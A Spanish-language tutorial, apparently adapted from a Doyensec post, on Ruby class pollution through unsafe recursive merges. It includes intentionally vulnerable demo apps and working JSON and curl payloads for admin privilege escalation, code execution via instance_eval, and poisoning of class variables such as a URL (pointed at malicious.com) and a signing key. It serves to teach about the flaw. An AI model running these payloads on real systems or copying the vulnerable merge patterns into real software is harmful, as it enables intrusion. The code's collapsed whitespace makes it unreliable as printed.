# Code from https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html# Comments added to exploit the merge on attributesrequire'json'# Base class for both Admin and Regular usersclassPersonattr_accessor :name, :age, :detailsdefinitialize(name:, age:, details:)@name = name@age = age@details = detailsend# Method to merge additional data into the objectdefmerge_with(additional)recursive_merge(self, additional)end# Authorize based on the `to_s` method resultdefauthorizeif to_s =="Admin"puts"Access granted: #{@name} is an admin."elseputs"Access denied: #{@name} is not an admin."endend# Health check that executes all protected methods using `instance_eval`defhealth_checkprotected_methods().each do|method|instance_eval(method.to_s)endendprivate# VULNERABLE FUNCTION that can be abused to merge attributesdefrecursive_merge(original, additional, current_obj= original)additional.each do|key, value|if value.is_a?(Hash)if current_obj.respond_to?(key)next_obj = current_obj.public_send(key)recursive_merge(original, value, next_obj)elsenew_object =Object.newcurrent_obj.instance_variable_set("@#{key}", new_object)current_obj.singleton_class.attr_accessor keyendelsecurrent_obj.instance_variable_set("@#{key}", value)current_obj.singleton_class.attr_accessor keyendendoriginalendprotecteddefcheck_cpuputs"CPU check passed."enddefcheck_memoryputs"Memory check passed."endend# Admin class inherits from PersonclassAdmin<Persondefinitialize(name:, age:, details:)super(name: name, age: age, details: details)enddefto_s"Admin"endend# Regular user class inherits from PersonclassUser<Persondefinitialize(name:, age:, details:)super(name: name, age: age, details: details)enddefto_s"User"endendclassJSONMergerAppdefself.run(json_input)additional_object =JSON.parse(json_input)# Instantiate a regular useruser =User.new(name: "John Doe",age: 30,details: {"occupation"=>"Engineer","location"=> {"city"=>"Madrid","country"=>"Spain"}})# Perform a recursive merge, which could override methodsuser.merge_with(additional_object)# Authorize the user (privilege escalation vulnerability)# ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'user.authorize# Execute health check (RCE vulnerability)# ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
user.health_checkendendifARGV.length !=1puts"Usage: ruby class_pollution.rb 'JSON_STRING'"exitendjson_input =ARGV[0]JSONMergerApp.run(json_input)
Escalamiento de Privilegios: El método authorize verifica si to_s devuelve "Admin." Al inyectar un nuevo atributo to_s a través de JSON, un atacante puede hacer que el método to_s devuelva "Admin," otorgando privilegios no autorizados.
Ejecución Remota de Código: En health_check, instance_eval ejecuta métodos listados en protected_methods. Si un atacante inyecta nombres de métodos personalizados (como "puts 1"), instance_eval lo ejecutará, lo que lleva a ejecución remota de código (RCE).
Esto solo es posible porque hay una instrucción eval vulnerable que ejecuta el valor de cadena de ese atributo.
Limitación de Impacto: Esta vulnerabilidad solo afecta a instancias individuales, dejando otras instancias de User y Admin sin afectar, limitando así el alcance de la explotación.
Casos del Mundo Real
deep_merge de ActiveSupport
Esto no es vulnerable por defecto, pero puede hacerse vulnerable con algo como:
# Method to merge additional data into the object using ActiveSupport deep_mergedefmerge_with(other_object)merged_hash = to_h.deep_merge(other_object)merged_hash.each do|key, value|self.class.attr_accessor keyinstance_variable_set("@#{key}", value)endselfend
Hashie’s deep_merge
El método deep_merge de Hashie opera directamente sobre los atributos del objeto en lugar de hashes simples. Previene la sustitución de métodos por atributos en una fusión con algunas excepciones: los atributos que terminan en _, ! o ? aún pueden fusionarse en el objeto.
Un caso especial es el atributo _ por sí solo. Solo _ es un atributo que generalmente devuelve un objeto Mash. Y debido a que es parte de las excepciones, es posible modificarlo.
Mira el siguiente ejemplo de cómo al pasar {"_": "Admin"} se puede eludir _.to_s == "Admin":
require'json'require'hashie'# Base class for both Admin and Regular usersclassPerson<Hashie::Mash# Method to merge additional data into the object using hashiedefmerge_with(other_object)deep_merge!(other_object)selfend# Authorize based on to_sdefauthorizeif _.to_s =="Admin"puts"Access granted: #{@name} is an admin."elseputs"Access denied: #{@name} is not an admin."endendend# Admin class inherits from PersonclassAdmin<Persondefto_s"Admin"endend# Regular user class inherits from PersonclassUser<Persondefto_s"User"endendclassJSONMergerAppdefself.run(json_input)additional_object =JSON.parse(json_input)# Instantiate a regular useruser =User.new({name: "John Doe",age: 30,details: {"occupation"=>"Engineer","location"=> {"city"=>"Madrid","country"=>"Spain"}}})# Perform a deep merge, which could override methodsuser.merge_with(additional_object)# Authorize the user (privilege escalation vulnerability)# Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.# Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'user.authorizeendendifARGV.length !=1puts"Usage: ruby hashie.rb 'JSON_STRING'"exitendjson_input =ARGV[0]JSONMergerApp.run(json_input)
Poison the Classes
En el siguiente ejemplo es posible encontrar la clase Person, y las clases Admin y Regular que heredan de la clase Person. También tiene otra clase llamada KeySigner:
require'json'require'sinatra/base'require'net/http'# Base class for both Admin and Regular usersclassPerson@@url ="http://default-url.com"attr_accessor :name, :age, :detailsdefinitialize(name:, age:, details:)@name = name@age = age@details = detailsenddefself.url@@urlend# Method to merge additional data into the objectdefmerge_with(additional)recursive_merge(self, additional)endprivate# Recursive merge to modify instance variablesdefrecursive_merge(original, additional, current_obj= original)additional.each do|key, value|if value.is_a?(Hash)if current_obj.respond_to?(key)next_obj = current_obj.public_send(key)recursive_merge(original, value, next_obj)elsenew_object =Object.newcurrent_obj.instance_variable_set("@#{key}", new_object)current_obj.singleton_class.attr_accessor keyendelsecurrent_obj.instance_variable_set("@#{key}", value)current_obj.singleton_class.attr_accessor keyendendoriginalendendclassUser<Persondefinitialize(name:, age:, details:)super(name: name, age: age, details: details)endend# A class created to simulate signing with a key, to be infected with the third gadgetclassKeySigner@@signing_key ="default-signing-key"defself.signing_key@@signing_keyenddefsign(signing_key, data)"#{data}-signed-with-#{signing_key}"endendclassJSONMergerApp<Sinatra::Base# POST /merge - Infects class variables using JSON inputpost '/merge'docontent_type :jsonjson_input =JSON.parse(request.body.read)user =User.new(name: "John Doe",age: 30,details: {"occupation"=>"Engineer","location"=> {"city"=>"Madrid","country"=>"Spain"}})user.merge_with(json_input){ status: 'merged' }.to_jsonend# GET /launch-curl-command - Activates the first gadgetget '/launch-curl-command'docontent_type :json# This gadget makes an HTTP request to the URL stored in the User classifPerson.respond_to?(:url)url =Person.urlresponse =Net::HTTP.get_response(URI(url)){ status: 'HTTP request made', url: url, response_body: response.body }.to_jsonelse{ status: 'Failed to access URL variable' }.to_jsonendend# Curl command to infect User class URL:# curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge
# GET /sign_with_subclass_key - Signs data using the signing key stored in KeySignerget '/sign_with_subclass_key'docontent_type :json# This gadget signs data using the signing key stored in KeySigner classsigner =KeySigner.newsigned_data = signer.sign(KeySigner.signing_key,"data-to-sign"){ status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_jsonend# Curl command to infect KeySigner signing key (run in a loop until successful):# for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done
# GET /check-infected-vars - Check if all variables have been infectedget '/check-infected-vars'docontent_type :json{user_url: Person.url,signing_key: KeySigner.signing_key}.to_jsonendrun! if app_file == $0end
Clase Padre Tóxica
Con esta carga útil:
curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge
Es posible modificar el valor del atributo @@url de la clase padre Person.
Envenenando Otras Clases
Con esta carga útil:
for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done
Es posible realizar un ataque de fuerza bruta a las clases definidas y en algún momento envenenar la clase KeySigner modificando el valor de signing_key por injected-signing-key.\